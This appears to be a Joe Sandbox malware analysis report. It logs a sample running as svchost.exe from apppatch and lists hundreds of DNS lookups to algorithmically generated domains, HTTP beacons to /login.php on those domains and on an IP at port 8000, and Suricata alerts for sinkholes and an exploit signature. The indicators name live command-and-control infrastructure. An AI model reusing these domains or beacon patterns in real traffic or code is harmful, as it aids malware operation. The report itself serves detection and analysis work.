Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrylix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahypus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylup.com replaycode: Name error (3)
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknown | Network traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 53550 -> 8000
Source: unknown | Network traffic detected: HTTP traffic on port 8000 -> 53550
Source: unknown | Network traffic detected: HTTP traffic on port 53553 -> 8000
Source: unknown | Network traffic detected: HTTP traffic on port 8000 -> 53553
Source: unknown | Network traffic detected: DNS query count 1002
Source: C:\Windows\apppatch\svchost.exe | Code function: 2_2_02C83D90 IsNetworkAlive, IsUserAnAdmin, DnsFlushResolverCache, memset, lstrcpynA, lstrcpynA, StrNCatA, StrNCatA, InternetCheckConnectionA, InternetCheckConnectionA, memset, lstrcpynA, StrNCatA, InternetCheckConnectionA
Source: global traffic | TCP traffic: 192.168.2.8:49728 -> 106.15.232.163:8000
Source: global traffic | DNS traffic detected: number of DNS queries: 1002
Source: Joe Sandbox View | IP Address: 3.94.10.34
Source: Joe Sandbox View | IP Address: 64.190.63.136
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49715
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49715
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49712
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49712
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49724
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49724
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.8:53598
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.8:53598
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49738
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:62057
Source: global traffic | HTTP traffic detected: GET /login.php HTTP/1.1 | Referer: http://www.google.com | User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | Host: puzylyp.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1 | Referer: http://www.google.com | User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | Host: 106.15.232.163:8000 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /login.php?sub1=20241112-0424-16c6-a16f-217434b104d2 HTTP/1.1 | Referer: http://www.google.com | User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | Host: ww16.vofycot.com | Connection: Keep-Alive | Cookie: __tad=1731345856.5179536
Source: global traffic | HTTP traffic detected: GET /login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79 HTTP/1.1 | Referer: http://www.google.com | User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | Host: ww25.lyxynyx.com | Connection: Keep-Alive | Cookie: __tad=1731345856.5241611
Source: global traffic | HTTP traffic detected: GET /login.php HTTP/1.1 | Referer: http://www.google.com | User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | Host: vojyqem.com | Cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
